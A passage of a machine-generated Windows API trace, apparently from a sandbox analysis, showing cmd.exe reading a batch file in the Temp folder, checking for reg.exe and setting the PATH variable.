RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ff820) returned 1 [0174.510] GetProcessHeap () returned 0x19a8f1e0000 [0174.510] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fb800) returned 1 [0174.510] _wcsicmp (_String1="set", _String2=")") returned 74 [0174.510] _wcsicmp (_String1="FOR", _String2="set") returned -13 [0174.510] _wcsicmp (_String1="FOR/?", _String2="set") returned -13 [0174.510] _wcsicmp (_String1="IF", _String2="set") returned -10 [0174.510] _wcsicmp (_String1="IF/?", _String2="set") returned -10 [0174.510] _wcsicmp (_String1="REM", _String2="set") returned -1 [0174.510] _wcsicmp (_String1="REM/?", _String2="set") returned -1 [0174.511] GetProcessHeap () returned 0x19a8f1e0000 [0174.511] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1e5e10 [0174.511] GetProcessHeap () returned 0x19a8f1e0000 [0174.511] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1e5950 [0174.511] GetProcessHeap () returned 0x19a8f1e0000 [0174.511] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xd2) returned 0x19a8f1e5ed0 [0174.512] _tell (_FileHandle=3) returned 909 [0174.512] _close (_FileHandle=3) returned 0 [0174.512] _wcsicmp (_String1="set", _String2="DIR") returned 15 [0174.512] _wcsicmp (_String1="set", _String2="ERASE") returned 14 [0174.512] _wcsicmp (_String1="set", _String2="DEL") returned 15 [0174.512] _wcsicmp (_String1="set", _String2="TYPE") returned -1 [0174.512] _wcsicmp (_String1="set", _String2="COPY") returned 16 [0174.512] _wcsicmp (_String1="set", _String2="CD") returned 16 [0174.512] _wcsicmp (_String1="set", _String2="CHDIR") returned 16 [0174.513] _wcsicmp (_String1="set", _String2="RENAME") returned 1 [0174.513] _wcsicmp (_String1="set", _String2="REN") returned 1 [0174.513] _wcsicmp (_String1="set", _String2="ECHO") returned 14 [0174.513] _wcsicmp (_String1="set", _String2="SET") returned 0 [0174.513] GetConsoleTitleW (in: lpConsoleTitle=0x43f9efec50, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0174.513] _wcsicmp (_String1="set", _String2="DIR") returned 15 [0174.513] _wcsicmp (_String1="set", _String2="ERASE") returned 14 [0174.513] _wcsicmp (_String1="set", _String2="DEL") returned 15 [0174.513] _wcsicmp (_String1="set", _String2="TYPE") returned -1 [0174.513] _wcsicmp (_String1="set", _String2="COPY") returned 16 [0174.514] _wcsicmp (_String1="set", _String2="CD") returned 16 [0174.514] _wcsicmp (_String1="set", _String2="CHDIR") returned 16 [0174.514] _wcsicmp (_String1="set", _String2="RENAME") returned 1 [0174.514] _wcsicmp (_String1="set", _String2="REN") returned 1 [0174.514] _wcsicmp (_String1="set", _String2="ECHO") returned 14 [0174.514] _wcsicmp (_String1="set", _String2="SET") returned 0 [0174.514] GetProcessHeap () returned 0x19a8f1e0000 [0174.514] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x194) returned 0x19a8f1e5fb0 [0174.514] GetProcessHeap () returned 0x19a8f1e0000 [0174.514] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1e5fb0, Size=0xd2) returned 0x19a8f1e5fb0 [0174.514] GetProcessHeap () returned 0x19a8f1e0000 [0174.514] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1e5fb0) returned 0xd2 [0174.514] wcsncmp (_String1="\"PAT", _String2="/", _MaxCount=0x4) returned -13 [0174.514] GetProcessHeap () returned 0x19a8f1e0000 [0174.514] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xda) returned 0x19a8f1ea4b0 [0174.514] _wcsnicmp (_String1="\"P", _String2="/A", _MaxCount=0x2) returned -13 [0174.514] _wcsnicmp (_String1="\"P", _String2="/P", _MaxCount=0x2) returned -13 [0174.514] SetEnvironmentVariableW (lpName="PATH", lpValue="C:\\Windows\\System32;C:\\Windows\\System32\\wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 1 [0174.514] GetProcessHeap () returned 0x19a8f1e0000 [0174.515] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1facd0) returned 1 [0174.515] GetEnvironmentStringsW () returned 0x19a8f1ec610* [0174.515] GetProcessHeap () returned 0x19a8f1e0000 [0174.515] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xa92) returned 0x19a8f1ed0b0 [0174.515] memcpy (in: _Dst=0x19a8f1ed0b0, _Src=0x19a8f1ec610, _Size=0xa92 | out: _Dst=0x19a8f1ed0b0) returned 0x19a8f1ed0b0 [0174.515] FreeEnvironmentStringsA (penv="=") returned 1 [0174.516] _get_osfhandle (_FileHandle=1) returned 0x24 [0174.516] SetConsoleMode (hConsoleHandle=0x24, dwMode=0x7) returned 1 [0174.516] _get_osfhandle (_FileHandle=1) returned 0x24 [0174.516] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x7ff7bd72960c | out: lpMode=0x7ff7bd72960c) returned 1 [0174.517] _get_osfhandle (_FileHandle=0) returned 0x20 [0174.517] GetConsoleMode (in: hConsoleHandle=0x20, lpMode=0x7ff7bd729608 | out: lpMode=0x7ff7bd729608) returned 1 [0174.517] SetConsoleInputExeNameW () returned 0x1 [0174.517] GetConsoleOutputCP () returned 0x1b5 [0174.517] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff7bd729660 | out: lpCPInfo=0x7ff7bd729660) returned 1 [0174.517] SetThreadUILanguage (LangId=0x0) returned 0x409 [0174.518] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x88 [0174.518] _open_osfhandle (_OSFileHandle=0x88, _Flags=8) returned 3 [0174.518] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.518] SetFilePointer (in: hFile=0x88, lDistanceToMove=909, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x38d [0174.518] GetProcessHeap () returned 0x19a8f1e0000 [0174.518] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ea4b0) returned 1 [0174.518] GetProcessHeap () returned 0x19a8f1e0000 [0174.519] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e5fb0) returned 1 [0174.519] GetProcessHeap () returned 0x19a8f1e0000 [0174.519] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e5ed0) returned 1 [0174.519] GetProcessHeap () returned 0x19a8f1e0000 [0174.519] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e5950) returned 1 [0174.519] GetProcessHeap () returned 0x19a8f1e0000 [0174.519] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e5e10) returned 1 [0174.519] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.519] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x38d [0174.520] ReadFile (in: hFile=0x88, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0174.520] SetFilePointer (in: hFile=0x88, lDistanceToMove=954, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3ba [0174.520] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="if exist \"%SystemRoot%\\Sysnative\\reg.exe\" (\r\n", cbMultiByte=45, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="if exist \"%SystemRoot%\\Sysnative\\reg.exe\" (\r\nSystem32\\wbem;%SystemRoot%\\System32\\WindowsPowerShell\\v1.0\\\"\r\n===============================\r\n") returned 45 [0174.520] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.520] GetFileType (hFile=0x88) returned 0x1 [0174.520] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.520] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3ba [0174.520] GetProcessHeap () returned 0x19a8f1e0000 [0174.520] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1fa1a0 [0174.520] GetProcessHeap () returned 0x19a8f1e0000 [0174.520] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4010) returned 0x19a8f1fe1c0 [0174.521] GetProcessHeap () returned 0x19a8f1e0000 [0174.521] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x26) returned 0x19a8f1eb9e0 [0174.521] GetEnvironmentVariableW (in: lpName="SystemRoot", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0xa [0174.521] GetProcessHeap () returned 0x19a8f1e0000 [0174.521] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb9e0) returned 1 [0174.521] GetProcessHeap () returned 0x19a8f1e0000 [0174.521] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fe1c0) returned 1 [0174.521] GetProcessHeap () returned 0x19a8f1e0000 [0174.522] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fa1a0) returned 1 [0174.522] _wcsicmp (_String1="if", _String2=")") returned 64 [0174.522] _wcsicmp (_String1="FOR", _String2="if") returned -3 [0174.522] _wcsicmp (_String1="FOR/?", _String2="if") returned -3 [0174.522] _wcsicmp (_String1="IF", _String2="if") returned 0 [0174.522] _wcsicmp (_String1="IF/?", _String2="if") returned 47 [0174.522] GetProcessHeap () returned 0x19a8f1e0000 [0174.522] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1e5e10 [0174.522] GetProcessHeap () returned 0x19a8f1e0000 [0174.522] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x16) returned 0x19a8f1e5950 [0174.522] GetProcessHeap () returned 0x19a8f1e0000 [0174.522] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x28) returned 0x19a8f1eb860 [0174.522] GetProcessHeap () returned 0x19a8f1e0000 [0174.522] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1eb860, Size=0x1e) returned 0x19a8f1eb6e0 [0174.522] GetProcessHeap () returned 0x19a8f1e0000 [0174.522] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1eb6e0) returned 0x1e [0174.522] _wcsicmp (_String1="exist", _String2="/I") returned 54 [0174.522] GetProcessHeap () returned 0x19a8f1e0000 [0174.522] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1e5ed0 [0174.522] GetProcessHeap () returned 0x19a8f1e0000 [0174.522] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1c) returned 0x19a8f1eb8f0 [0174.523] _wcsicmp (_String1="ERRORLEVEL", _String2="exist") returned -6 [0174.523] _wcsicmp (_String1="EXIST", _String2="exist") returned 0 [0174.523] GetProcessHeap () returned 0x19a8f1e0000 [0174.523] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4e) returned 0x19a8f1f8be0 [0174.523] GetProcessHeap () returned 0x19a8f1e0000 [0174.523] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x8c) returned 0x19a8f1e5f90 [0174.523] GetProcessHeap () returned 0x19a8f1e0000 [0174.523] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1e5f90, Size=0x50) returned 0x19a8f1e5f90 [0174.523] GetProcessHeap () returned 0x19a8f1e0000 [0174.523] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1e5f90) returned 0x50 [0174.523] GetProcessHeap () returned 0x19a8f1e0000 [0174.523] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1e5ff0 [0174.523] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.523] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3ba [0174.523] ReadFile (in: hFile=0x88, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efebc0, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efebc0*=0x1fff, lpOverlapped=0x0) returned 1 [0174.523] SetFilePointer (in: hFile=0x88, lDistanceToMove=1071, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x42f [0174.523] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="set \"PATH=%SystemRoot%\\Sysnative;%SystemRoot%\\Sysnative\\wbem;%SystemRoot%\\Sysnative\\WindowsPowerShell\\v1.0\\;%PATH%\"\r\n", cbMultiByte=117, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="set \"PATH=%SystemRoot%\\Sysnative;%SystemRoot%\\Sysnative\\wbem;%SystemRoot%\\Sysnative\\WindowsPowerShell\\v1.0\\;%PATH%\"\r\n=====================\r\n") returned 117 [0174.523] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.523] GetFileType (hFile=0x88) returned 0x1 [0174.523] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.523] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x42f [0174.523] GetProcessHeap () returned 0x19a8f1e0000 [0174.524] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1fa1a0 [0174.524] GetProcessHeap () returned 0x19a8f1e0000 [0174.524] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4010) returned 0x19a8f1fe1c0 [0174.524] GetProcessHeap () returned 0x19a8f1e0000 [0174.524] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x26) returned 0x19a8f1eb920 [0174.524] GetEnvironmentVariableW (in: lpName="SystemRoot", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0xa [0174.524] GetProcessHeap () returned 0x19a8f1e0000 [0174.524] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb920) returned 1 [0174.524] GetProcessHeap () returned 0x19a8f1e0000 [0174.524] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fe1c0) returned 1 [0174.525] GetProcessHeap () returned 0x19a8f1e0000 [0174.525] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4010) returned 0x19a8f1fe1c0 [0174.525] GetProcessHeap () returned 0x19a8f1e0000 [0174.525] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x26) returned 0x19a8f1eb920 [0174.525] GetEnvironmentVariableW (in: lpName="SystemRoot", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0xa [0174.525] GetProcessHeap () returned 0x19a8f1e0000 [0174.525] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb920) returned 1 [0174.525] GetProcessHeap () returned 0x19a8f1e0000 [0174.525] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fe1c0) returned 1 [0174.525] GetProcessHeap () returned 0x19a8f1e0000 [0174.526] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4010) returned 0x19a8f1fe1c0 [0174.526] GetProcessHeap () returned 0x19a8f1e0000 [0174.526] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x26) returned 0x19a8f1eb6b0 [0174.526] GetEnvironmentVariableW (in: lpName="SystemRoot", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0xa [0174.526] GetProcessHeap () returned 0x19a8f1e0000 [0174.526] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb6b0) returned 1 [0174.526] GetProcessHeap () returned 0x19a8f1e0000 [0174.526] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fe1c0) returned 1 [0174.526] GetProcessHeap () returned 0x19a8f1e0000 [0174.526] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4010) returned 0x19a8f1fe1c0 [0174.526] GetProcessHeap () returned 0x19a8f1e0000 [0174.527] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1a) returned 0x19a8f1eb6b0 [0174.527] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x58 [0174.527] GetProcessHeap () returned 0x19a8f1e0000 [0174.527] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb6b0) returned 1 [0174.527] GetProcessHeap () returned 0x19a8f1e0000 [0174.527] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fe1c0) returned 1 [0174.527] GetProcessHeap () returned 0x19a8f1e0000 [0174.527] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fa1a0) returned 1 [0174.528] _wcsicmp (_String1="FOR", _String2="set") returned -13 [0174.528] _wcsicmp (_String1="FOR/?", _String2="set") returned -13 [0174.528] _wcsicmp (_String1="IF", _String2="set") returned -10 [0174.528] _wcsicmp (_String1="IF/?", _String2="set") returned -10 [0174.528] _wcsicmp (_String1="REM", _String2="set") returned -1 [0174.528] _wcsicmp (_String1="REM/?", _String2="set") returned -1 [0174.528] GetProcessHeap () returned 0x19a8f1e0000 [0174.528] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1e60b0 [0174.528] GetProcessHeap () returned 0x19a8f1e0000 [0174.528] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1ecaa0 [0174.529] GetProcessHeap () returned 0x19a8f1e0000 [0174.529] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18a) returned 0x19a8f1ece20 [0174.530] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.530] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x42f [0174.530] ReadFile (in: hFile=0x88, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efeb60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efeb60*=0x1fff, lpOverlapped=0x0) returned 1 [0174.530] SetFilePointer (in: hFile=0x88, lDistanceToMove=1074, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x432 [0174.530] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=")\r\n", cbMultiByte=3, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr=")\r\n \"PATH=%SystemRoot%\\Sysnative;%SystemRoot%\\Sysnative\\wbem;%SystemRoot%\\Sysnative\\WindowsPowerShell\\v1.0\\;%PATH%\"\r\n=====================\r\n") returned 3 [0174.530] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.530] GetFileType (hFile=0x88) returned 0x1 [0174.530] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.530] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x432 [0174.530] GetProcessHeap () returned 0x19a8f1e0000 [0174.530] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1fa1a0 [0174.530] GetProcessHeap () returned 0x19a8f1e0000 [0174.531] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fa1a0) returned 1 [0174.531] _wcsicmp (_String1="ELSE", _String2="\n") returned 91 [0174.531] _tell (_FileHandle=3) returned 1074 [0174.531] _close (_FileHandle=3) returned 0 [0174.533] GetFullPathNameW (in: lpFileName="C:\\Windows\\Sysnative\\reg.exe", nBufferLength=0x208, lpBuffer=0x43f9efea40, lpFilePart=0x43f9efe7e0 | out: lpBuffer="C:\\Windows\\Sysnative\\reg.exe", lpFilePart=0x43f9efe7e0*="reg.exe") returned 0x1c [0174.533] wcsncmp (_String1="C:\\W", _String2="\\\\.\\", _MaxCount=0x4) returned -25 [0174.533] FindFirstFileExW (in: lpFileName="C:\\Windows\\Sysnative\\reg.exe" (normalized: "c:\\windows\\sysnative\\reg.exe"), fInfoLevelId=0x1, lpFindFileData=0x43f9efe7f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x43f9efe7f0) returned 0xffffffffffffffff [0174.533] GetLastError () returned 0x3 [0174.533] FindClose (in: hFindFile=0xffffffffffffffff | out: hFindFile=0xffffffffffffffff) returned 0 [0174.533] GetLastError () returned 0x6 [0174.534] _get_osfhandle (_FileHandle=1) returned 0x24 [0174.534] SetConsoleMode (hConsoleHandle=0x24, dwMode=0x7) returned 1 [0174.534] _get_osfhandle (_FileHandle=1) returned 0x24 [0174.534] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x7ff7bd72960c | out: lpMode=0x7ff7bd72960c) returned 1 [0174.534] _get_osfhandle (_FileHandle=0) returned 0x20 [0174.534] GetConsoleMode (in: hConsoleHandle=0x20, lpMode=0x7ff7bd729608 | out: lpMode=0x7ff7bd729608) returned 1 [0174.535] SetConsoleInputExeNameW () returned 0x1 [0174.535] GetConsoleOutputCP () returned 0x1b5 [0174.535] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff7bd729660 | out: lpCPInfo=0x7ff7bd729660) returned 1 [0174.535] SetThreadUILanguage (LangId=0x0) returned 0x409 [0174.536] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x88 [0174.536] _open_osfhandle (_OSFileHandle=0x88, _Flags=8) returned 3 [0174.536] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.536] SetFilePointer (in: hFile=0x88, lDistanceToMove=1074, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x432 [0174.536] GetProcessHeap () returned 0x19a8f1e0000 [0174.536] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ece20) returned 1 [0174.536] GetProcessHeap () returned 0x19a8f1e0000 [0174.536] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ecaa0) returned 1 [0174.536] GetProcessHeap () returned 0x19a8f1e0000 [0174.537] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e60b0) returned 1 [0174.537] GetProcessHeap () returned 0x19a8f1e0000 [0174.537] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e5ff0) returned 1 [0174.537] GetProcessHeap () returned 0x19a8f1e0000 [0174.537] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e5f90) returned 1 [0174.537] GetProcessHeap () returned 0x19a8f1e0000 [0174.538] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f8be0) returned 1 [0174.538] GetProcessHeap () returned 0x19a8f1e0000 [0174.538] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb8f0) returned 1 [0174.538] GetProcessHeap () returned 0x19a8f1e0000 [0174.538] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e5ed0) returned 1 [0174.538] GetProcessHeap () returned 0x19a8f1e0000 [0174.538] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb6e0) returned 1 [0174.538] GetProcessHeap () returned 0x19a8f1e0000 [0174.538] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e5950) returned 1 [0174.538] GetProcessHeap () returned 0x19a8f1e0000 [0174.538] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e5e10) returned 1 [0174.539] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.539] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x432 [0174.539] ReadFile (in: hFile=0x88, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0174.539] SetFilePointer (in: hFile=0x88, lDistanceToMove=1076, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x434 [0174.539] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="\r\n\n \"PATH=%SystemRoot%\\Sysnative;%SystemRoot%\\Sysnative\\wbem;%SystemRoot%\\Sysnative\\WindowsPowerShell\\v1.0\\;%PATH%\"\r\n=====================\r\n") returned 2 [0174.539] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.539] GetFileType (hFile=0x88) returned 0x1 [0174.539] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.539] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x434 [0174.539] GetProcessHeap () returned 0x19a8f1e0000 [0174.539] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1fa1a0 [0174.539] GetProcessHeap () returned 0x19a8f1e0000 [0174.540] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fa1a0) returned 1 [0174.540] _tell (_FileHandle=3) returned 1076 [0174.540] _close (_FileHandle=3) returned 0 [0174.540] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x88 [0174.540] _open_osfhandle (_OSFileHandle=0x88, _Flags=8) returned 3 [0174.540] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.540] SetFilePointer (in: hFile=0x88, lDistanceToMove=1076, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x434 [0174.540] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.540] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x434 [0174.541] ReadFile (in: hFile=0x88, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: 